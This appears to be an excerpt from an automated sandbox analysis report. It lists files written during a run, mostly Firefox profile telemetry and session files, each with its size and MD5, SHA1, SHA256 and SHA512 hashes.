SHA256fa7d2f0e04f603fb357bc3da02cde5d729c8638f5b75bed099acd7e392f7495a
SHA512783f0bf89fb94a27ded997264037ca456ef9af46ae59617db56b25106aa764c30cc9587869f281379ba49094c6322a0dec570c9744386b750e3d1cf9a739a37c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD57fcf07f7c496fdc4b8d888aea7abb972
SHA11c0b7040ccc40ab8d641367c9a6370bd5ffbbacd
SHA25660459ef1600198185aec7e55ae6c18d5bc465a235dcc3a9e9651163ddcc04b9a
SHA512ab6b336b8bad1b5e38abe1d2a68f03b1c82559da6c32454b7d8dfbeefd321ef5e7bba74051a6d84c5ddc8f299083be0c21b02212743c9047877be82c5a78f425
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\datareporting\glean\db\data.safe.tmp
Filesize17KB
MD596e5a69fdb2b6a9099a819f8265a5fd2
SHA179effc08f61e25fd15b6934e018a34dc78210988
SHA256f5be75a7711c3d64d87acda4a299ec316432072fd589f82fd66da05424f51350
SHA51299ad0f8681fdd2fee094f752b41231a4750b36f9df7d10fc1876cb44cdf8db477ab4116ccf3b7e3ec43b0853f27332fa1a2438396ecab84b964a0971988513ae
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\datareporting\glean\pending_pings\0a7a89e0-222d-4726-9525-33bceafeb52e
Filesize659B
MD51ed9a0957ed718ecb1cc56ae80a8638b
SHA1d1557907f51f2b64ff125ceedb5241be1b4f1319
SHA256d1adc358726dfcb147a9f5a533c3a536ed25f8d2bf3f4f916943954baf40e6cb
SHA512f6e566b69d08a5829d963d3e64b56a5cf68d54c666533025c9d78c74339c967688a273f96492faf938ae9c4b4ae533c4551f4dbc0d81003a2d5c50c728b55e10
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\datareporting\glean\pending_pings\2530c574-2993-417a-847a-460d85f48b5d
Filesize905B
MD59033658fa1f1f59db38b4e51f42d07ce
SHA184e9fba5852c55ea8718de87d47f6fe2a707fc71
SHA25692198d5ba676c6603ed0f37049b9d9c6fb404ebef8b6bec14c88e2ec2478a970
SHA512f26dac8156f778176865b96812ba02b9083c486b8520b0f20b503ae9e63c8dbf7188ef000bb787150aee4e11e41e628d9ac2b14827c92414bd9389c637c9a684
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\datareporting\glean\pending_pings\4a6bad72-de18-407c-800a-e821c7180e07
Filesize25KB
MD54e0ad9a8c430550fdc54911c847181ec
SHA1e4291bd9f4f240ad54b5c474ab678729141b1682
SHA256e4ff1d9db199da8488b83773f3e3664f0c18b6c53ed66d2a7aec0e0d424c2e1d
SHA512046baedd50d7f43c7f90d6827e561795dc9e4891e295516aa65d1587dc7c600413d86870920bffc1300571cc135e53f0d3faa91c617d084f0219c8da59431321
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\datareporting\glean\pending_pings\a75fc955-4a27-4650-a618-113ab98adeec
Filesize982B
MD577aaa956e680667d166a221d4e4363a6
SHA143485bd3e38560091a82c7c8d6facdbbd7bf80d3
SHA2568ec53e72afa38e6931466b40a5cbf5bac1b4508a223a6ea30595da254904f2ca
SHA512012ccb50bd93502cab104cfa4fd1337380986d2d1b55b864b652b3deee46d8825afd119f5dead67cb675300fcad3b9695e35db238dbe8bda76b28880a093d8da
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\datareporting\glean\pending_pings\b396a4ff-0805-49df-be78-086547cd7a25
Filesize659B
MD54842420ac61df0dc6e0642af19c819e7
SHA1bc7c7a6675e18becea727002a1bcba44107aa7be
SHA256d400e5f481dd4577149c384346b71602f96e6855868642053af182df215a7aa9
SHA512d2da7fcf22aa8976bcdc070bf13a8c95e8df9878f54136deaeebba2a7c224fcbc8a5c632a522b21dbd451f614d35b950ef67ffaf2c9b6a613ec1300eb2ebeea0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\datareporting\glean\pending_pings\c842e371-e7ca-492a-ab90-6f2f4ce6964e
Filesize671B
MD51357434b19189b283a34b1421a72d2d4
SHA13a14e94636ce65a892e1d17994551c6f5c6da198
SHA2563db768028b027ae0503f5d8d38b929fff224a34540ba8dc0e7675a62fb88bf70
SHA5128dc9ff999ca56c72238a0f901313cf388568c5df8037d039be02d1286967f6b38ce35b45cda7e46e3700bd693505da6b49fdd6e3669c3e66e5579a84d4b3dc08
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\datareporting\glean\pending_pings\e633e008-aa8f-4aa1-ac28-b6af0812cbbd
Filesize905B
MD5f6d7362a6f63c1aea65935515e6d7e1a
SHA1eda37924abc437d2728d4273d3b7a6bb13cf862f
SHA256321db57adf18119bf61ad92eb7ff667b204455e91ce451ab28d3ff062b1b874e
SHA51287dc5cb53b13568cd177d58043a3d4eafb0d314404ee50524e384168c77dbef23f9400c1d26b5c04d31fd56de85c9b0e355aa04f9787e59a42a0a4953b2585a6
-
Filesize
5.0MB
MD50878a888cdce630cb03167d69d953cc9
SHA1ac8d3c479d67c8b4fec089557db737274e4be9a8
SHA2565ca0b14fe734eae13155f9ef56fabd2db10f47bc688da7bb0a0b5aadfb758c99
SHA512fde9078f7eda5a56308295e7a53245b1af12986a3d01238a46a0368bf318eb72fde43e1dba92d1127ddfbfc29b73450f0ba35896c54853e10c6482752607ebbd
-
Filesize
9KB
MD5116c33c267a60822eb628493bb37522f
SHA16fd8cd61c292634a27f91805b29ca6b9c1c480b0
SHA256a01a49ffc21a4a847b52edfcfa4bec0816b30bb56c5f17e2a051a54d41e5e3b3
SHA5124289420503d36aa15c8d20cddeccd732b40c94b27bb6eca31da7f28c6937acf9368332c02fea98655392d1810bdf267a4738ac2e1572fb42e85875bcb19f028e
-
Filesize
9KB
MD5b9f2f0dbacf520b5d65887ccbd7ab2c1
SHA1de262ca9367651d9849640cd03d8d64054f946a8
SHA256d06456c985c0f15bd31f48a7e898878e6059d1608d8ac7aa67a56fbc35a3be70
SHA512b29870da94f6fb982d7f332ab52759fd115e3590d4b36c6f0079351a09f6e4d3610e806d3950802f751d58cca48253391245fbc38ad54269b26bd779aa57d783
-
Filesize
9KB
MD53a2de72b57ce435e3f72e47ecbf8a593
SHA13036428a92a2a76ab40db7838465f37126a18793
SHA256537eb8aacb8642d6731824f629cd1c1cbe63c72fcbb0e12652673b3bdb6f5ef1
SHA512552f3ac0fdf544cc223da2415a07393b5ee371288e85fb1a2826d5ad5327f06bfe5a3e7c99a855ad6206447d43457996be5b14a53746c19f301975ca955435c3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\sessionCheckpoints.json
Filesize53B
MD5ea8b62857dfdbd3d0be7d7e4a954ec9a
SHA1b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a
SHA256792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da
SHA512076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\sessionCheckpoints.json
Filesize146B
MD565690c43c42921410ec8043e34f09079
SHA1362add4dbd0c978ae222a354a4e8d35563da14b4
SHA2567343d5a46e2fca762305a4f85c45484a49c1607ede8e8c4bd12bedd2327edb8d
SHA512c0208d51cf1586e75f22764b82c48ecbb42c1ff54aa412a85af13d686e0119b4e49e98450d25c70e3792d3b9c2cda0c5ab0c6931ebaf548693bb970a35ae62b9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\sessionCheckpoints.json
Filesize122B
MD599601438ae1349b653fcd00278943f90
SHA18958d05e9362f6f0f3b616f7bfd0aeb5d37967c9
SHA25672d74b596f7fc079d15431b51ce565a6465a40f5897682a94a3f1dd19b07959a
SHA512ffa863d5d6af4a48aadc5c92df4781d3aacbf5d91b43b5e68569952ffec513ff95655b3e54c2161fe27d2274dd4778bad517c7a3972f206381ef292808628c55
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\sessionCheckpoints.json
Filesize90B
MD5c4ab2ee59ca41b6d6a6ea911f35bdc00
SHA15942cd6505fc8a9daba403b082067e1cdefdfbc4
SHA25600ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2
SHA51271ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\sessionCheckpoints.json.tmp
Filesize212B
MD529ce37dc02c78bbe2e5284d350fae004
SHA1bab97d5908ea6592aef6b46cee1ded6f34693fa2
SHA2561bfee61e2f346959c53aa41add4b02d2b05c86c9f19ffefe1018f4a964bf4693
SHA51253a9eb746e193c088210d8eaa6218d988f3a67ee4cb21844d682ff0178db040932404f5ce2f3cf8b4576313ba0ec33c04ca288c3412bfa5df7dd8230cc2068bb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\sessionCheckpoints.json.tmp
Filesize288B
MD5948a7403e323297c6bb8a5c791b42866
SHA188a555717e8a4a33eccfb7d47a2a4aa31038f9c0
SHA2562fca1f29b73dd5b4159fa1eb16e69276482f5224ba7d2219a547039129a51f0e
SHA51217e2f65c33f47c8bb4beca31db2aff3d4bbb6c2d36924057f9f847e207bdcb85ffcbb32c80dd06862ffc9b7f0bd3f5e2e65b48bb1bc3363732751101d5596b1a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rr7c0353.default-release\sessionCheckpoints.json.tmp
Filesize288B
MD56b77a9f779399e95d1cee931a2c8f8ff
SHA1826efd4feb0d50fcce5696111af7c811b81adcd9
SHA2563a0285c8233ef0324b269f7291094e19fd9b77259f9419861ad796f7e9c979f3
SHA512ef537c75fab8e86483ac03cc0d2feaf41575e35f54b95669a26bf6dfbf58021dc9a5bbe54d9537b55da3fbb0e0262adf6c5efd4394faaec81a31604533afec4f
-
Filesize
120B
MD58d689c06cb844185099c0398a280537e
SHA157073c7526ec37e94bb9db44fedc6d50276f7a6b
SHA25696729e9b38f216605ff10715f96f364be32f02e2de23ede7e74b78244605124d
SHA5123c7df326c695143915df1068cb2c0f58e93e4881b2c4d94b33948b80e954fbd4cf944ae53b4d15002b79fcdb8e88f8e9cf4c89ca50f56b7cfd8a13ea7dd6fff8
-
Filesize
5.5MB
MD58c58909f6e59e09cfde1ab840a86f0b4
SHA19ebebf2a84020b617838d197fbb813e78852b539
SHA2560f066adb9060ff792102d487f508137f52f93fd2817ff535cae536c77bc9cd38
SHA512f987fb7ec9d48f80e4925276378ed4e7022ff86db7a16293e253a7f280c5af9ac984340c37c0c8f98fe88671d9ba687ff039c9819a8ace412d54c6fe0b2648b7
-
Filesize
26B
MD5fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98
-
Filesize
361KB
MD5e3143e8c70427a56dac73a808cba0c79
SHA163556c7ad9e778d5bd9092f834b5cc751e419d16
SHA256b2f57a23ecc789c1bbf6037ac0825bf98babc7bf0c5d438af5e2767a27a79188
SHA51274e0f4b55625df86a87b9315e4007be8e05bbecca4346a6ea06ef5b1528acb5a8bb636ef3e599a3820dbddcf69563a0a22e2c1062c965544fd75ec96fd9803fc
-
Filesize
187B
MD515c8c4ba1aa574c0c00fd45bb9cce1ab
SHA10dad65a3d4e9080fa29c42aa485c6102d2fa8bc8
SHA256f82338e8e9c746b5d95cd2ccc7bf94dd5de2b9b8982fffddf2118e475de50e15
SHA51252baac63399340427b94bfdeb7a42186d5359ce439c3d775497f347089edfbf72a6637b23bb008ab55b8d4dd3b79a7b2eb7c7ef922ea23d0716d5c3536b359d4
-
Filesize
4KB
MD58b8ef806cbcf060d0e7c063767dc8aa7
SHA187bcc1d5d79d93799fcd75615ac796ed27aa7264
SHA2563c1915d1493dbc52ea25f17cdfd33580acd0a87965af468fedead457886cd594
SHA512aa61b187931e03b454c24d57f6350f45f002292a3cc116939275cf0fa174bc0edf48e7ababda08179eb0202ed4fbb428a2676e688d3a429a5eb19fde4eb475d7
-
Filesize
275KB
MD52232c07e354364e0eb1dc80024593826
SHA165bb4232c0416cfb2c158bfc32a7732ad72cee72
SHA256fb1cd5e7c3ea30dfafd3cc1862e311388361d896610db28c63716da9d71e8f3f
SHA512f0d295565b209f4dedd2a79123fa54ff9b8cbb173f14463ab3d3707b8d87aad84b05c2898478ecc148e29d02fa07ddda9499795e0ceafc2982c0adbd570a3572
-
Filesize
281KB
MD5718222e232d11298dfbabbc2b70d8b14
SHA189fc560692111c2245694867b8772fd8969f46d2
SHA25645e855461f5d1be28a2f88416603070bd1778055abdd06834ae58e97b7ddf53c
SHA5129191961c28a7a4647ae8f9f9e1956d60b97f5f5c3e4e838d888bf78c1ea665e98e8e3c75cc1247a68a89b2413493ea6d39dbc60827eec919ddba0536d793c801
-
Filesize
143KB
MD584a1cc9540d5cdad74bc54f8090dd27a
SHA1c6f82d1491015457785ae0d365e7196d693d9a6b
SHA2562738720da0b6ce474ca6eb51a92372d047eca2d713c256f0cd6c147ac3a0db21
SHA5129c25d6e7331844d01d732ac923e99c68f305749d92407c873cd09b451e59a8864001e308864fda319fa4a2bcae9dbe50682201c67901dce14272291dedecd2c8
-
Filesize
2.4MB
MD59dc4f1f432d21a1b16b1ea956e976c49
SHA18dd8f2e19741ad3387110875969f89e8fdd7236c
SHA256a69bc1b3ee708440bc5022a053b93f3622d22a677a472465d41b6240e5bccea3
SHA512834808d6ef53dfd2f5c479abffb9fe3cdb6ec1bf8972bbd4bc855c6e097ba31955d6d9b38c71208d24b65ee1f73ce2a1a48246de3391c643d6987d9e75762b12
-
Filesize
104KB
MD591fe5366b30c2c7b20328b12d2072e54
SHA1da968e3d6f5b329ad33c38ee8504e6b7676b25f3
SHA2564ec8f4216b4cc5c8751fed197c972d53421b1660e44f625ddb464b86ae04725f
SHA5123a2dfc50722e3d906cc8e4bee6b2f357407cb598bdba53f17991c06b98d37691a9eb271290f08e54cf8ee91da0719aab6402840ae9e0aac6c8caa59b33ee1ab8
-
Filesize
104KB
MD5239ae0bc94f533fd51caf85ec4e15431
SHA110fde0c79cdae4b4314f4e1e77e95715ef8d5a1a
SHA2569c908172e58696f98489c3a501759326d756302a8fac26a9c9abf7cb7b92b664
SHA5121d631a6fe373bcba1aa046fd04a20d26ccb300b4e1a9343dd4499275c51fe408e314097b2bbacb038d7ef0198b9222439d19bd09bee1e0621f6cf7425e44e81f
-
Filesize
9KB
MD5faba2ccb8fe366fd281ca6be6d2bb7c2
SHA1bb7bd32a21f3eba652fde24146387ffc5278143e
SHA256602187e5470ddbdf9421045bb0515f358c88bf88f59fd8a886fb6373da5d0f82
SHA512ec424a545e2598f299706499dab07b4d12b0734a52f928216a53bca2b7f384b97bd4fc092d7d68de636a75daf79ac392c4b49b7251ec011236de1659253d6214
-
Filesize
37KB
MD51945d7d1f56b67ae1cad6ffe13a01985
SHA12c1a369f9e12e5c6549439e60dd6c728bf1bffde
SHA256eb58bf00df7b4f98334178e75df3348c609ea5c6c74cf7f185f363aa23976c8b
SHA51209af87898528eaa657d46c79b7c4ebc0e415478a421b0b97355294c059878178eb32e172979ee9b7c59126861d51a5831e337a96666c43c96cb1cf8f11bc0a0f
-
Filesize
1KB
MD58480579050970b0812cc3d9a1bce1340
SHA1edebebd090602f4eee375ad754c8566d4fda23cb
SHA25644098408ab9611dd99a38e140c7fb1ca5dce6eb2d5f0d5e500547ac1ba5d235b
SHA51246de9202c3cf0ddbf19f9e0e02ec17530f2722abfa08669fd30a6095ce2342fa89a2cc59c1d47afd82b48c915bb95f4c6d16e7c21129a9c8f09c2bf239566933
-
Filesize
11KB
MD571ecece58bb00bdc1e728ee28d7a5332
SHA14305889415cf95662a30d024f1138f1af224cf42
SHA256ee062e5ef2743ceab10c64830e4cefe52e35cc1ece85947ac4e61ddd1c0b05f7
SHA5129b23404d867fc4fd7c7beeba3768e8fed3113cc7430ec1bc9ca7faf6e6105388de7057b1402f9b4ba8fbc11e5fcd3afe14233721e8d15b6c0bed40f65aa5b58b
-
Filesize
40KB
MD51bb9772a05517e227d1dafd3936e8f66
SHA1d695ca5791a4b6a3509939aebdfaf5e229c6fbcf
SHA256581dcaace05d5c1ac9512457ff50565aca5d904d2c209bd3fc369ca4d4a0d2b1
SHA5123f1966038f91b887fe1a71474929bd87f3c75091846c6e9563f7424d3a7c19c908f1d874895341c61a868a616aba637e3d4188d4ebb7383087886a13a4dc0aa2
-
Filesize
7KB
MD56f5ffb58a9e406ab1643c890e2a198c6
SHA13ff1faba00ac18a93e88a6f2bbfa747c9fdc7e0c
SHA2561327ab3a8c50691f04bea8e2ca356c5b604092a719e219464f8cc4b42e192de9
SHA512af29bc13cc02238208c51e4e95dd0a4445a952755635a9eab38aa77a5c087cc8e2025af55d8f3a0e9f2430baa91534e7f892bb71aa0ef72bab4483211a845b4b
-
Filesize
50KB
MD5888eb713a0095756252058c9727e088a
SHA1c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4
SHA25679434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067
SHA5127c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0